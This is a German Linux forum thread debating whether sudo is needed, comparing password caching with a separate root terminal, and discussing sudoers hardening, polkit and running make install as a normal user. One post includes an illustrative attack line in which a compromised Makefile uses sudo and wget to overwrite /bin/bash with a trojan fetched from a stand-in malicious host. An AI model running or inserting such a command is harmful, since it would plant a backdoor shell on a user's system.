Aber wie ist das schlimmer als ein root panel das immer da ist?niemand hat geschrieben:02.12.2017 16:09:49Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
braucht man "sudo" ?
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
Re: braucht man "sudo" ?
Genau so sehe ich das auch. Wenn alles "einfach so" geht, merkt ein Einsteiger gar nicht, was er da macht.niemand hat geschrieben:02.12.2017 15:45:11Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.
Und nochmal volle Zustimmung.niemand hat geschrieben:02.12.2017 16:09:49Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Wenn ich root- und Nutzerbefehle abwechselnd eingeben muss, öffne ich halt zwei Terminals.
Re: braucht man "sudo" ?
Angenommen, du hast das Makefile nicht geprüft, sondern, weil’s aus vermeintlich sicherer Quelle stammt (die aber leider, wie’s ja ab und zu passiert, aufgemacht wurde) gleich durchlaufen lassen. Dir fehlt eine Lib → „sudo“, Userpass, installieren, alles fein. Du lässt das File nochmal durchlaufen, die Lib ist nun da, und nebenbei installiert’s dir mit etwa „sudo wget -o /bin/bash https://böslinge.inc/trojan_bash“ eine hübsche neue Shell. Dies z.B. kann bei der Variante mit dem Multiplexer nicht passieren. Abgesehen davon ist das Root-Pane nicht immer da, sondern wird wieder zugemacht, sobald der Build durch ist. Während deine 15 Minuten möglicherweise noch nicht abgelaufen sind, nachdem du fertig bist, und noch anderen Kram mit dieser Shell machst.Lord_Carlos hat geschrieben:02.12.2017 16:14:29Aber wie ist das schlimmer als ein root panel das immer da ist?
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Mhh, so oder so bin ich gefickt. Crypto Währung mining, spam versenden, Daten lesen/loeschen etc. alle ohne root.
Ich sehe ein das eines Schlimmer ist als das andere, aber ob mich nun jemand mit einer Waffe erschießt oder ich durch ein Messerstich langsam Sterbe, am ende bin ich tot.
Ich kenne mich mit make nicht so aus, aber koennte es bei #make install aus der root Konsole auch eine neue Shell installieren?
Sudo im anderem Pane ist dann das beste aus beiden Welten Weil man automatisch ausgelogged wird.
Ich sehe ein das eines Schlimmer ist als das andere, aber ob mich nun jemand mit einer Waffe erschießt oder ich durch ein Messerstich langsam Sterbe, am ende bin ich tot.
Ich kenne mich mit make nicht so aus, aber koennte es bei #make install aus der root Konsole auch eine neue Shell installieren?
Sudo im anderem Pane ist dann das beste aus beiden Welten Weil man automatisch ausgelogged wird.
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
Re: braucht man "sudo" ?
Sure, die Malware kann auch als User laufen. Aber mit UID0 lässt’s sich viel schöner verstecken und ist daher weit langlebiger. Außerdem wirkt Ransomware viel toller, wenn sie sich schon im Bootloader mit dem Hinweis meldet, das System wäre nun verschlüsselt und man solle doch dem armen Entwickler einige Kekse zukommen lassen, um das zu beheben. Und auch Keylogger und Screenshot/-recording-Programme laufen viel besser mit ausreichenden Berechtigungen. Auch nicht zu verachten sind die Ports unterhalb 1024, die sich nur mit UID0 aufmachen lassen.
# make install kann im Grunde alles überschreiben. Damit haben sich ja auch schon einige ihr System damit zerlegt: irgendwas damit installiert, das dann Files überschrieben hat, die ’nem installierten Paket gehört haben. Das ist einer der Hauptgründe, warum man’s gefälligst mit --prefix=~/… konfigurieren, und make install als User ausführen sollte.
# make install kann im Grunde alles überschreiben. Damit haben sich ja auch schon einige ihr System damit zerlegt: irgendwas damit installiert, das dann Files überschrieben hat, die ’nem installierten Paket gehört haben. Das ist einer der Hauptgründe, warum man’s gefälligst mit --prefix=~/… konfigurieren, und make install als User ausführen sollte.
- ingo2
- Beiträge: 1124
- Registriert: 06.12.2007 18:25:36
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Wo der gute Riesling wächst
Re: braucht man "sudo" ?
Das sollte man dann wenigstens gleich in der sudoers ändern:niemand hat geschrieben:02.12.2017 16:09:49Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Code: Alles auswählen
Defaults !lecture,tty_tickets,!fqdn,targetpw,timestamp_timeout = 0
avatar: [http://mascot.crystalxp.net/en.id.2938- ... nther.html MF-License]
Re: braucht man "sudo" ?
Ein falscher sudo-Befehl ist wie ein falscher root-Befehl. root ist root. Was soll das mit dem Abmelden? Was soll neben abgeforkten Prozessen noch mehr passieren? Oder werden Kindsprozesse wie screen, tmux, ... beendet? Kann das mal jemand testen?
Ich sehe keinen Vorteil im Ubuntu-sudo-Umfeld ... eher Nachteile.
Code: Alles auswählen
sudo whoami
- novalix
- Beiträge: 1909
- Registriert: 05.10.2005 12:32:57
- Lizenz eigener Beiträge: MIT Lizenz
- Wohnort: elberfeld
Re: braucht man "sudo" ?
@Lord_Carlos Anwendungsbeispiel ist doch ein klassisches Einsatzszenario für sudo.
Allerdings eben nicht für eine Konfiguration à la "Mitglied der Gruppe sudo darf alles mit Password-Caching".
Wenn sein Softwarebau-User oder generischer ein Mitglied der Gruppe "Softwarebau" per /etc/sudoers das Recht bekommt "/usr/bin/apt" auszuführen, ist doch alles in Butter; selbst mit einem Timeout über Null (der Default bei Upstream liegt übrigens bei fünf Minuten).
Ein Aufruf von wget um eine Systemdatei zu überschreiben wie in @niemands Beispiel wäre dann nicht möglich.
Genau für solche Szenarien ist sudo konzipiert. Man muss es eben nur auch richtig konfigurieren.
Per aspera ad astra.
Allerdings eben nicht für eine Konfiguration à la "Mitglied der Gruppe sudo darf alles mit Password-Caching".
Wenn sein Softwarebau-User oder generischer ein Mitglied der Gruppe "Softwarebau" per /etc/sudoers das Recht bekommt "/usr/bin/apt" auszuführen, ist doch alles in Butter; selbst mit einem Timeout über Null (der Default bei Upstream liegt übrigens bei fünf Minuten).
Ein Aufruf von wget um eine Systemdatei zu überschreiben wie in @niemands Beispiel wäre dann nicht möglich.
Genau für solche Szenarien ist sudo konzipiert. Man muss es eben nur auch richtig konfigurieren.
Per aspera ad astra.
Das Wem, Wieviel, Wann, Wozu und Wie zu bestimmen ist aber nicht jedermannns Sache und ist nicht leicht.
Darum ist das Richtige selten, lobenswert und schön.
Darum ist das Richtige selten, lobenswert und schön.
Re: braucht man "sudo" ?
Ich glaube, hier wollte auch niemand, ehmm...: keiner , die Nützlichkeit von sudo für bestimmte Zwecke und in sinnvoller Konfiguration bestreiten, aber "MAN" braucht sudo eben eher nicht.
Grüße, Günther
Grüße, Günther
Re: braucht man "sudo" ?
Vor dem Hintergrund, dass das m.M.n bei Debian gar nicht so ein großes Problem ist, wenn der unbedarfte User einfach nur den Hinweisen des Installers folgt und sich daran hält, empfinde ich das auch gar nicht so sehr als beunruhigend. Zumal diese Community ja hierzu auch eine deutliche Meinung hat. Das größere Problem sehe ich hier bei Ubuntu und Mint. Da wird definitiv kein "Newbie" oder Windows-Umsteiger sudo richtig konfigurieren, weil es in deren Community weder Hinweise dazu gibt, noch überhaupt ein Problembewusstsein besteht. Ganz im Gegenteil, da wird sogar das root-PWD als Sicherheitsrisiko hingestellt und munter der fahrlässige Missbrauch von sudo empfohlen. Natürlich juckt uns das hier nicht... aber da steckt schon Potential drin, dem Ruf von Linx allgemein zu schaden... muss nicht, aber es ist möglich... und das gefällt mir nicht.
Re: braucht man "sudo" ?
Ich denke es ist im Augenblick so:
Es gibt das "Sudo - System" das allen lieb geworden ist, man es verdammt aber irgendwie doch haben will.
Zu allem Unglück kann man nun auch noch Debian per Installer "ubuntuisieren"
Und es gibt das PolicyKit (polkit polkit1) das, soweit ich weiß, noch relativ neu ist.
Beide Systeme existieren z.Z. mehr oder weniger gleichberechtigt nebeneinander. Was verwirrend ist, da beide Systeme Gleiches
ermöglichen.
Ich vermute mal, das sich die Sudo- Geschichte irgendwann erledigt haben wird.
Durch die vielen Diskussionen hier hab ich angefangen, mich mit dem Polkit etwas zu beschäftigen, und festgestellt, das Sudo einfach überflüssig ist. ----> apt purge sudo gksu* und ich lebe damit wunderbar
Es gibt das "Sudo - System" das allen lieb geworden ist, man es verdammt aber irgendwie doch haben will.
Zu allem Unglück kann man nun auch noch Debian per Installer "ubuntuisieren"
Und es gibt das PolicyKit (polkit polkit1) das, soweit ich weiß, noch relativ neu ist.
Beide Systeme existieren z.Z. mehr oder weniger gleichberechtigt nebeneinander. Was verwirrend ist, da beide Systeme Gleiches
ermöglichen.
Ich vermute mal, das sich die Sudo- Geschichte irgendwann erledigt haben wird.
Durch die vielen Diskussionen hier hab ich angefangen, mich mit dem Polkit etwas zu beschäftigen, und festgestellt, das Sudo einfach überflüssig ist. ----> apt purge sudo gksu* und ich lebe damit wunderbar